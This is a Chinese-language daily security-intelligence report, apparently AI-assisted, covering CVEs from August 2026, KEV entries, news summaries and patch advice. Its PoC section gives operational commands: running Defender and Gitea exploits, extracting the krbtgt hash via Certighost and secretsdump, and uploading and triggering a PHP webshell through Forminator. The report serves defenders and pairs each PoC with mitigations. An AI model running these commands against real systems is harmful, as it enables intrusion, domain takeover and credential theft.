每日安全情报报告
由 AI 整理发布
本报告聚焦 2026-08-16 至 2026-08-18 近 24--48 小时内新增/持续在野的高危漏洞、最新 PoC 与网络安全文章。所有外链均已附可点击锚文本。风险级别:🔴 严重(CVSS ≥ 9.0 或在野利用)/ 🟠 高危(CVSS 7.0--8.9)/ 🟡 中危。
一、最新高危漏洞(CVE / 风险标注)
🔴 1. CVE-2026-69414 --- Microsoft Defender「ShieldBreak」零日本地提权
- 漏洞类型:权限提升(EoP,本地)→ SYSTEM(绕过 RoguePlanet / CVE-2026-50656 补丁)
- 受影响组件:Microsoft Malware Protection Engine / Microsoft Defender(Windows 10、11、Server 全部受支持版本)
- CVSS 评分 :微软评级 Critical(EoP),CVSS 正式分值待分配(利用条件:需 Defender 启用 + 本地低权限)
- 在野利用 :❌ 暂无在野确认,但 公开 PoC 已武器化,宣称在最新 Windows 11 25H2 / Server 2025 上成功率 100%(Will Dormann、Kevin Beaumont 独立验证)
- 状态 :微软 8/17 确认正在开发补丁,当前 无官方修复
- 链接 :BleepingComputer 报道 · NVD 详情 · CSDN 实战复现
- 备注:研究者 Nightmare Eclipse 于 8/12(Patch Tuesday 次日)公开,利用 Cloud Filter API(cfapi)在 Defender 云扫描期间篡改文件内容实现提权,属「补丁绕过」型 0-Day。
🔴 2. CVE-2026-15748 --- Forminator WordPress 插件未认证 RCE(恶意 PHP 上传)
- 漏洞类型:任意文件上传(PHP Webshell)→ 远程代码执行
- 受影响组件 :Forminator Forms WordPress 插件 ≤ 1.56.1(60 万+ 活跃安装)
- CVSS 评分 :9.8(Critical)
- 在野利用:⚠️ 暂无公开 PoC / 未确认在野,但利用前置条件明确(表单需含「文件上传 + 下拉选择」两类字段),风险极高
- 状态:已修复(1.56.2,2026-07-31)
- 链接 :The Hacker News 报道 · NVD 详情
- 根因 :
handle_file_upload()危险扩展名黑名单使用精确匹配,被管道替代 MIME 类型键绕过;攻击者伪造 Select 字段值注入上传配置,文件落至无.htaccess保护的自定义存储目录即被服务器执行。
🟠 3. CVE-2026-19478 --- GitLab CE/EE GraphQL 指令代码注入
- 漏洞类型:代码生成控制不当(CWE-94)→ 未认证可远程修改/删除公共项目及用户数据
- 受影响组件:GitLab CE/EE 18.2--<18.11.11、19.0--<19.0.8、19.1--<19.1.6、19.2--<19.2.4(仅 Self-Managed 实例需处置)
- CVSS 评分 :9.4(Critical) ;向量
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H - 在野利用:❌ 暂无公开 exploit / 在野证据(CISA ADP 标记 none,未入 KEV)
- 状态:已修复(19.2.4 / 19.1.6 / 19.0.8 / 18.11.11,2026-08-17 紧急补丁)
- 链接 :The Hacker News 报道 · GitLab 官方安全公告 · NVD 详情
- 备注 :同批修复 CVE-2026-19650(GraphQL multiplex CSRF,CVSS 7.1,需用户交互)。官方尚未公开具体 directive 与 payload,90 天后才披露技术细节;鉴于网络可达、无需权限/交互,不应等待 PoC。
🔴 4. CVE-2026-65400 --- Apple macOS 屏幕共享认证绕过(在野利用)
- 漏洞类型:认证绕过(状态管理缺陷)→ 远程控制 + 获取 root
- 受影响组件:macOS Tahoe 26.6.1 / Sequoia 15.7.9 / Sonoma 14.8.9(TCP 5900 暴露设备)
- CVSS 评分 :9.8(CISA 8/14 由 7.1 上调至 9.8,认定可自动化利用)
- 在野利用 :✅ 确认在野(NCSC-NL 8/12 警报,所有案例均获取 root 并植入门罗币挖矿程序;Black Hat 已演示)
- 状态:已修复(苹果 8/6 紧急带外更新)
- 链接 :The Hacker News 报道 · NVD 详情 · IT之家中文报道
- 备注:开启屏幕共享即向公网暴露 5900 端口;暂未更新用户应关闭屏幕共享功能。
🔴 5. CVE-2026-58231 --- SAP Commerce Cloud 授权绕过(在野利用)
- 漏洞类型:授权检查不足 + 输入验证不当 → 未认证 RCE
- 受影响组件:SAP Commerce Cloud(默认认证客户端被滥用)
- CVSS 评分 :10.0(Critical)
- 在野利用 :✅ 确认在野(补丁 8/11 发布仅 3 天即捕获利用尝试,早于公开 PoC)
- 状态 :SAP 已发布补丁;CISA 尚未入 KEV
- 链接 :NVD 详情 · SentryInsight 摘要
- 备注:本刊连续两日列为最高优先级,SAP Commerce Cloud 客户须立即应用安全更新。
🔴 6. CVE-2026-59310 --- VMware vCenter 目录遍历 RCE(在野利用)
- 漏洞类型:目录遍历 → 未认证远程代码执行
- 受影响组件:VMware vCenter Server
- CVSS 评分 :9.8(Critical)
- 在野利用 :✅ 确认在野(QUIRSO 观测受害 IP 达 361 个、分布 47 国,部署 Babuk 衍生勒索软件,植入 reverse_ssh 持久化)
- 状态:Broadcom 已发布补丁(9.1.0.0300 / 9.0.2.0100 / 8.0 U3k·U2f)
- 链接 :The Hacker News 报道 · NVD 详情
🟠 7. CVE-2026-64564 --- SCTPhantom Linux 内核 SCTP UAF 本地提权 / 容器逃逸
- 漏洞类型:释放后使用(UAF)→ 本地提权 root + 容器逃逸(潜伏 18 年)
- 受影响组件:Linux 内核 SCTP 实现(v2.6.25 至最新,修复 6.6.148 / 6.12.101 / 6.18.42 / 7.1.6)
- CVSS 评分 :9.8(Critical)
- 在野利用:❌ 暂无在野确认;腾讯朱雀实验室(AI 多智能体)复现
- 链接 :The Hacker News 报道 · NVD 详情 · 腾讯朱雀分析
🟠 8. CVE-2026-64531 --- OVSwrap Linux 内核 Open vSwitch 本地提权
- 漏洞类型:本地权限提升 → root(无需内存整形,攻击面广)
- 受影响组件:Linux 内核 Open vSwitch 模块(多数主流发行版)
- CVSS 评分:高危(本地提权)
- 在野利用:❌ 暂无在野确认;补丁已发布
- 链接 :FreeBuf 早报(OVSwrap 详情) · NVD 详情
- 备注:建议升级内核并禁用非特权用户命名空间。
🟠 9. CVE-2026-59774 + CVE-2026-60004 --- Gitea 文件读取 + 未认证 RCE
- 漏洞类型:CVE-2026-59774 任意文件读取;CVE-2026-60004 远程代码执行(markup / diffpatch 端点注入)
- 受影响组件:Gitea ≤ 1.27.0(默认开放注册可零凭证入侵)
- CVSS 评分 :CVE-2026-60004 9.8(Critical)
- 在野利用:⚠️ 已被主动扫描;公开 exploit 可用
- 状态:已修复(1.27.1)
- 链接 :The Hacker News 报道 · NVD 详情 CVE-2026-60004 · NVD 详情 CVE-2026-59774
- 备注:管理员应升级至 1.27.1 并审查 markup 端点匿名 POST 日志,轮换内部令牌/OAuth/JWT/数据库凭据。
🟠 10. CVE-2026-54121 --- Certighost 企业 CA 权限提升(域接管)
- 漏洞类型:权限提升 → 标准域用户将企业 CA 转变为域控制器(Tier 0 身份基础设施沦陷)
- 受影响组件:Windows AD CS(企业证书服务)
- CVSS 评分 :8.8(High)
- 在野利用:❌ 暂无在野确认;完整 PoC 已公开
- 状态:补丁可用
- 链接 :NVD 详情 · BleepingComputer 报道
二、持续在野利用 / KEV 窗口期(简表)
| CVE | 组件 | CVSS | 状态 | 链接 |
|---|---|---|---|---|
| CVE-2026-72898 | Metabase SQL 注入(未认证管理员接管) | 10.0 | KEV 在野 | NVD |
| CVE-2026-20349 | Cisco ASA/FTD 堆检查未认证 DoS | 8.6 | KEV(截止 8/14 已逾期) | NVD |
| CVE-2026-68820 | Windows afd.sys UAF 本地提权(Lazarus 零日武器化) | 7.0 | KEV(截止 8/25) | NVD |
| CVE-2026-9198 | IBM Langflow 代码注入未认证 RCE | 9.8 | KEV 在野 | NVD |
| CVE-2026-34486 | Apache Tomcat EncryptInterceptor 绕过 | 7.5 | KEV 在野 | NVD |
| CVE-2026-18556 / 18577 | N-able N-central 认证绕过 | 8.2 | KEV 在野 | NVD CVE-2026-18556 |
| CVE-2026-63077 | JetBrains TeamCity 未认证 RCE | 9.8 | KEV 在野 | NVD |
| CVE-2025-68686 | FortiOS SSL-VPN 符号链接持久化补丁绕过 | --- | KEV 在野 | NVD |
三、最新漏洞 PoC(含使用步骤)
1. ShieldBreak --- CVE-2026-69414(Defender 本地提权,公开 PoC 武器化)
公开 PoC 由研究者 Nightmare Eclipse 发布(参考 BleepingComputer 与 CSDN 实战复现)。复现需目标已开启 Defender、攻击者已获本地低权限执行。
bash
# 1) 获取研究者公开 PoC(以研究者公开发布仓库为准,注意合法授权环境使用)
git clone https://github.com/<researcher-public-repo>/ShieldBreak.git
cd ShieldBreak
# 2) 依赖(Windows 侧通常为预编译二进制或 Python 脚本,无需额外安装)
# 前置:目标开启 Microsoft Defender、拥有低权限本地账户
# 3) 以低权限用户执行,触发 Cloud Filter API 时序竞争,提升至 SYSTEM
python shieldbreak.py # 或运行对应编译产物
whoami # 预期输出 NT AUTHORITY\SYSTEM
注意:该利用依赖 Defender 启用(关闭 Defender 反而无法触发);微软暂无补丁,建议以 EDR 行为检测 + 限制低权限用户命名空间作为缓解。
2. Gitea RCE --- CVE-2026-60004(markup / diffpatch 端点注入)
默认开放注册实例可零凭证入侵,公开 exploit 可用。升级 1.27.1 即可修复。
bash
# 1) 克隆公开复现仓库(以社区公开 PoC 为准)
git clone https://github.com/<public-poc>/gitea-CVE-2026-60004.git
cd gitea-CVE-2026-60004
pip install requests
# 2) 针对目标实例执行(匿名 POST 到 markup 端点注入 Git hook)
python exploit.py --url http://TARGET:3000 --repo owner/repo
检测:审查 Gitea 日志中 markup 端点的匿名 POST 请求,立即轮换内部令牌/OAuth/JWT/数据库凭据。
3. Certighost --- CVE-2026-54121(AD CS 域接管)
低权限域用户可将企业 CA 冒充为域控制器并 DCSync 提取 krbtgt。完整 PoC 已公开。
bash
# 1) 克隆公开 PoC 仓库(以社区公开仓库为准)
git clone https://github.com/<public-poc>/Certighost.git
cd Certighost
pip install impacket
# 2) 以低权限域用户运行,将企业 CA 提升为 DC 并抽取哈希
python certighost.py DOMAIN/lowpriv:Pass@dc01.domain.local
secretsdump.py DOMAIN/CA\$@dc01.domain.local -just-dc-user krbtgt
缓解:限制企业 CA 服务器的域成员资格与委派,审计 CA 证书模板(ESC1--ESC8)。
4. Forminator --- CVE-2026-15748(技术复现,暂无公开完整 PoC)
根因已公开:伪造 Select 字段值注入上传字段配置,绕过
handle_file_upload()黑名单。概念性复现:
bash
# 向含「文件上传 + 下拉选择」字段的表单提交特制请求,上传 .php 至无 .htaccess 保护的自定义存储根
curl -k -F "upload_field=@shell.php" \
-F "select_field=../../../custom_upload/shell.php" \
http://TARGET/wp-admin/admin-ajax.php\?action=forminator_submit_form
# 随后请求上传文件 URL 触发 PHP 执行
curl -k http://TARGET/wp-content/custom_upload/shell.php
修复 :升级 Forminator ≥ 1.56.2;避免自定义文件上传存储根,或确保该目录存在 .htaccess 禁止 PHP 执行。
5. Snowflake GitHub Actions 注入(无 CVE,Wiz Red Agent 复现)
位于
snowflakedb/snowflake-connector-net的.github/workflows/jira_issue.yml,AI(Copilot Autofix)合并的改动移除了安全转义,将 issue 标题直接拼接进 shell。Wiz Red Agent 已授权复现并提取 Jira token;无公开 PoC,提供检测要点。
bash
# 技术复现(仅限授权安全测试):在 issues:opened 事件中提交含单引号的 issue 标题实现 shell 逃逸
# TITLE=$(echo '${{ github.event.issue.title }}' | sed ...) ← 单引号可提前闭合 echo 包裹
# 防御:禁用在 run: 块中直接展开 ${{ github.event.* }},改用 env: 变量 + jq --arg
修复:Snowflake 已于 2026-06-23 合并修复(PR #1402,改为环境变量传参);相关 Jira token 已轮换。开发者应审计所有 PR 中由 AI Autofix 修改的输入处理逻辑。
四、网络安全最新文章(标题 / 摘要 / 链接)
- Forminator WordPress 插件未认证 RCE(恶意 PHP 上传) --- Wordfence 披露 60 万+ 安装插件高危漏洞,攻击者无需认证即可上传并执行 PHP。阅读原文(The Hacker News)
- Microsoft Defender「ShieldBreak」零日提权 --- 微软确认 CVE-2026-69414 并正开发补丁,公开 PoC 可绕过 RoguePlanet 修复获取 SYSTEM。阅读原文(BleepingComputer)
- Snowflake GitHub Actions 注入:AI 写 bug,AI 利用 --- Copilot Autofix 合并的改动引入 shell 注入,Wiz Red Agent 五天后自动复现并窃取 Jira 凭据。阅读原文(The Hacker News)· Wiz 技术分析(IntelFusions)
- GitLab GraphQL 严重漏洞可删改公共项目 --- 未认证攻击者借 GraphQL 指令远程修改/删除公共项目,CVSS 9.4,紧急补丁发布。阅读原文(The Hacker News)· 官方公告
- VMware vCenter 在野利用部署 Babuk 衍生勒索 --- QUIRSO 观测 361 个受害 IP 跨 47 国,利用 CVE-2026-59310 植入反向 SSH 持久化。阅读原文(The Hacker News)
- SAP Commerce Cloud CVE-2026-58231 补丁后 3 天即遭在野利用 --- CVSS 10.0 未认证 RCE,利用尝试早于公开 PoC。查看详情(NVD)
- macOS 屏幕共享 CVE-2026-65400 在野安装门罗币挖矿 --- NCSC-NL 确认所有案例获取 root,CISA 上调至 9.8。查看详情(NVD)
- Certighost:藏在证书颁发机构中的权限提升 --- 标准域用户可将企业 CA 变为域控制器,实现 Tier 0 沦陷。查看详情(NVD)
- FreeBuf 早报:OVSwrap 可获 root / Tomcat 加密漏洞在野 --- OVSwrap Linux 提权、CISA 警告 Tomcat CVE-2026-34486 在野利用等速递。阅读原文(FreeBuf)
- FreeBuf 早报:LiteLLM 供应链 / Adobe ColdFusion 三连 CVSS 10.0 --- LiteLLM 供应链攻击或波及 2500 家企业,Adobe 修复 ColdFusion 与 Campaign Classic 严重漏洞。阅读原文(FreeBuf)
五、今日要点速览
- 🔴 最高优先级:CVE-2026-69414(Defender ShieldBreak 零日,无补丁、公开 PoC)、CVE-2026-65400(macOS 在野)、CVE-2026-58231(SAP 在野)、CVE-2026-59310(vCenter 在野)。
- 🟠 新增已修复高危:CVE-2026-15748(Forminator WP RCE 9.8)、CVE-2026-19478(GitLab GraphQL 9.4)、CVE-2026-64564(SCTPhantom 9.8)、CVE-2026-59774/60004(Gitea)。
- 🤖 AI 安全趋势:Snowflake CI/CD 事件显示「AI 写补丁引入漏洞 → AI Agent 自动利用」,再次印证 AI 辅助修复需人工核验安全边界。
- 🛡️ 处置建议:优先修补公网暴露的 VPN/防火墙/网关与 CI/CD 平台;域环境审计 AD CS 模板;WordPress 插件持有方立即升 Forminator ≥ 1.56.2。
部分内容由 AI 辅助生成